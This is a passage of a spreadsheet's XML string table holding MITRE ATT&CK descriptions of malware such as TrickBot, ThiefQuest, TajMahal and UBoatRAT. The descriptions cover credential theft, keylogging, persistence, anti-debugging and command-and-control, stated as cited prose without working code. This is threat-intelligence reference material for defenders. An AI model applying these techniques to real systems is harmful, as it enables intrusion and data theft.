    <t>[TYPEFRAME](https://attack.mitre.org/software/S0263) variants can add malicious DLL modules as new services.[TYPEFRAME](https://attack.mitre.org/software/S0263) can also delete services from the victim’s machine.(Citation: US-CERT TYPEFRAME June 2018)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) can perform DLL loading.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) uses RC4 to encrypt the message body of HTTP content.(Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture VoiceIP application audio on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index and compress files into a send queue for exfiltration.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to manage an automated queue of egress files and commands sent to its C2.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal data from the clipboard of an infected host.(Citation: Kaspersky TajMahal April 2019)
</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal documents from the local system including the print spooler queue.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject DLLs for malicious plugins into running processes.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to send collected files over its C2.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to index files from drives, user profiles, and removable drives.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture keystrokes on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) can set the &lt;code&gt;KeepPrintedJobs&lt;/code&gt; attribute for configured printers in &lt;code&gt;SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers&lt;/code&gt; to enable document stealing.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has used an encrypted Virtual File System to store plugins.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify connected Apple devices.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify running processes and associated plugins on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify which anti-virus products, firewalls, and anti-spyware products are in use.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject the &lt;code&gt;LoadLibrary&lt;/code&gt; call template DLL into running processes.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the Internet Explorer (IE) version on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify hardware information, the computer name, and OS information on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to identify the MAC address on an infected host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to determine local time on a compromised host.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture webcam video.(Citation: Kaspersky TajMahal April 2019)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover processes running on a system.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to enumerate security software currently running on a system by process name of known products.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[Tasklist](https://attack.mitre.org/software/S0057) can be used to discover services running on a system.(Citation: Microsoft Tasklist)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses [AppleScript](https://attack.mitre.org/techniques/T1059/002)'s &lt;code&gt;osascript -e&lt;/code&gt; command to launch [ThiefQuest](https://attack.mitre.org/software/S0595)'s persistence via [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004). (Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) searches through the &lt;code&gt;/Users/&lt;/code&gt; folder looking for executable files. For each executable, [ThiefQuest](https://attack.mitre.org/software/S0595) prepends a copy of itself to the beginning of the file. When the file is executed, the [ThiefQuest](https://attack.mitre.org/software/S0595) code is executed first. [ThiefQuest](https://attack.mitre.org/software/S0595) creates a hidden file, copies the original target executable to the file, then executes the new hidden file to maintain the appearance of normal behavior. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.(Citation: wardle evilquest partii)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the function &lt;code&gt;kill_unwanted&lt;/code&gt; to obtain a list of running processes and kills each process matching a list of security related processes.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) exfiltrates targeted file extensions in the &lt;code&gt;/Users/&lt;/code&gt; folder to the command and control server via unencrypted HTTP. Network packets contain a string with two pieces of information: a file path and the contents of the file in a base64 encoded string.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) hides a copy of itself in the user's &lt;code&gt;~/Library&lt;/code&gt; directory by using a &lt;code&gt;.&lt;/code&gt; at the beginning of the file name followed by 9 random characters.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;CGEventTap&lt;/code&gt; functions to perform keylogging.(Citation: Trendmicro Evolving ThiefQuest 2020)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) installs a launch item using an embedded encrypted launch agent property list template. The plist file is installed in the &lt;code&gt;~/Library/LaunchAgents/&lt;/code&gt; folder and configured with the path to the persistent binary located in the &lt;code&gt;~/Library/&lt;/code&gt; folder.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>When running with root privileges after a [Launch Agent](https://attack.mitre.org/techniques/T1543/001) is installed, [ThiefQuest](https://attack.mitre.org/software/S0595) installs a plist file to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; establishing persistence as a Launch Daemon. (Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) obtains a list of running processes using the function &lt;code&gt;kill_unwanted&lt;/code&gt;.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uses the &lt;code&gt;kill_unwanted&lt;/code&gt; function to get a list of running processes, compares each process with an encrypted list of “unwanted” security related programs, and kills the processes for security related programs.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t xml:space="preserve">[ThiefQuest](https://attack.mitre.org/software/S0595) uses a function named &lt;code&gt;is_debugging&lt;/code&gt; to perform anti-debugging logic. The function invokes &lt;code&gt;sysctl&lt;/code&gt; checking the returned value of &lt;code&gt;P_TRACED&lt;/code&gt;. [ThiefQuest](https://attack.mitre.org/software/S0595) also calls &lt;code&gt;ptrace&lt;/code&gt; with the &lt;code&gt;PTRACE_DENY_ATTACH&lt;/code&gt; flag to prevent debugging.  </t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) invokes &lt;code&gt;time&lt;/code&gt; call to check the system's time, executes a &lt;code&gt;sleep&lt;/code&gt; command, invokes a second &lt;code&gt;time&lt;/code&gt; call, and then compares the time difference between the two &lt;code&gt;time&lt;/code&gt; calls and the amount of time the system slept to identify the sandbox.(Citation: wardle evilquest parti)</t>
  </si>
  <si>
    <t>[ThiefQuest](https://attack.mitre.org/software/S0595) uploads files via unencrypted HTTP. (Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains functionality to collect information from the clipboard.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can disable Avira anti-virus.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains keylogger functionality.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can create a shortcut in the Windows startup folder for persistence.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) contains screen capture functionality.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) supports execution from the command-line.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) can install as a Windows service for persistence.(Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption, using TLS by default.(Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>Traffic traversing the [Tor](https://attack.mitre.org/software/S0183) network will be forwarded to multiple nodes before exiting the [Tor](https://attack.mitre.org/software/S0183) network and continuing on to its intended destination.(Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can implant malicious code into a compromised device's firmware.(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has come with a signed downloader component.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) used COM to setup scheduled task for persistence.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[TrickBot](https://attack.mitre.org/software/S0266) has the ability to capture RDP credentials by capturing the &lt;code&gt;CredEnumerateA&lt;/code&gt; API(Citation: TrendMicro Trickbot Feb 2019) </t>
  </si>
  <si>
    <t>Credential Stuffing</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses brute-force attack against RDP with rdpscanDll module.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP.(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019) Additionally, it searches for the ".vnc.lnk" affix to steal VNC credentials.(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using [esentutl](https://attack.mitre.org/software/S0404).(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has retrieved PuTTY credentials by querying the &lt;code&gt;Software\SimonTatham\Putty\Sessions&lt;/code&gt; registry key (Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects local files and information from the victim’s local machine.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) decodes the configuration data and modules.(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can disable Windows Defender.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can gather information about domain trusts by utilizing [Nltest](https://attack.mitre.org/software/S0359).(Citation: Fortinet TrickBot)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects email addresses from Outlook.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can send information about the compromised host to a hardcoded C2 server.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) utilizes EternalBlue and EternalRomance exploits for lateral movement in the modules wormwinDll, wormDll, mwormDll, nwormDll, tabDll.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) module "Trickboot" can write or erase the UEFI/BIOS firmware of a compromised device.(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) downloads several additional files and saves them to the victim's machine.(Citation: Trend Micro Totbrick Oct 2016)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects the users of the system.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has attempted to get users to launch malicious documents to deliver its payload. (Citation: TrendMicro Trickbot Feb 2019)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>The [TrickBot](https://attack.mitre.org/software/S0266) downloader has used an icon to appear as a Microsoft Word document.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can modify registry entries.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses the Windows API call, CreateProcessW(), to manage execution flow.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>Some [TrickBot](https://attack.mitre.org/software/S0266) samples have used HTTP over ports 447 and 8082 for C2.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: Trend Micro Totbrick Oct 2016)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can steal passwords from the KeePass open source password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can identify the groups the user on a compromised host belongs to.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses module networkDll for process list discovery.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) injects into the svchost.exe process.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence in the Startup folder.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses vncDll module to remote control the victim machine.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can enumerate computers and network devices.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) creates a scheduled task on the system that provides persistence.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) leverages a custom packer to obfuscate its functionality.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used an email with an Excel sheet containing a malicious macro to deploy the malware(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has been delivered via malicious links in phishing e-mails.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can Base64-encode C2 commands.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.(Citation: Fidelis TrickBot Oct 2016)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) gathers the OS version, machine name, CPU type, amount of RAM available, and UEFI/BIOS firmware information from the victim’s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: Cyberreason Anchor December 2019)(Citation: Eclypsium Trickboot December 2020)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) obtains the IP address, location, and other relevant network information from the victim’s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can identify the user and groups the user belongs to on a compromised host.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects a list of install programs and services on the system’s machine.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.(Citation: S2 Grupo TrickBot June 2017)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used macros in Excel documents to download and deploy the malware on the user’s machine.(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence by creating an autostart service that allows it to run whenever the machine boots.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Trojan.Karagany](https://attack.mitre.org/software/S0094) can monitor the titles of open windows to identify specific keywords.(Citation: Secureworks Karagany July 2019)  </t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can secure C2 communications with SSL and TLS.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can steal data and credentials from browsers.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) has used plugins with a self-delete capability.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can enumerate files and directories on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can upload, download, and execute files on the victim.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture keystrokes on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create directories to store plugin output and stage data for exfiltration.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can dump passwords and save them into &lt;code&gt;\ProgramData\Mail\MailAg\pwds.txt&lt;/code&gt;.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can base64 encode and AES-128-CBC encrypt data prior to transmission.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [Tasklist](https://attack.mitre.org/software/S0057) to collect a list of running tasks.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create a link to itself in the Startup folder to automatically start itself upon system restart.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can take a desktop screenshot and save the file into &lt;code&gt;\ProgramData\Mail\MailAg\shot.png&lt;/code&gt;.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture information regarding the victim's OS, security, and hardware configuration.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information on the network configuration of a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [netstat](https://attack.mitre.org/software/S0104) to collect a list of network connections.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information about the user on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can inject a suspended thread of its own process into a new process and initiate via the &lt;code&gt;ResumeThread&lt;/code&gt; API.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can communicate with C2 via HTTP POST requests.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can perform reconnaissance commands on a victim machine via a cmd.exe process.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Mebromi](https://attack.mitre.org/software/S0001) performs BIOS modification and can download and execute a file as well as protect itself from removal.(Citation: Ge 2011)</t>
  </si>
  <si>
    <t>To establish persistence, [Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key with a value "TaskMgr" in an attempt to masquerade as the legitimate Windows Task Manager.(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>[Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key to establish persistence.(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>[UACMe](https://attack.mitre.org/software/S0116) contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) takes advantage of the /SetNotifyCmdLine option in [BITSAdmin](https://attack.mitre.org/software/S0190) to ensure it stays running on a system to maintain persistence.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) has used GitHub and a public blog service in Hong Kong for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can upload and download files to the victim’s machine.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) encrypts instructions in the payload using a simple XOR cipher.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can list running processes on the system.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) has used HTTP for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can start a command shell.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the victim's current directory.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) can download and upload files to and from the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) can capture desktop screenshots in the PNG format and send them to the C2 server.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>Some versions of [UPPERCUT](https://attack.mitre.org/software/S0275) have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the system’s hostname and OS version.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the victim's proxy information.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to collect the current logged on user’s username from a machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to obtain the time zone information and current timestamp of the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has used HTTP for C2, including sending error codes in Cookie headers.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) uses cmd.exe to execute commands on the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
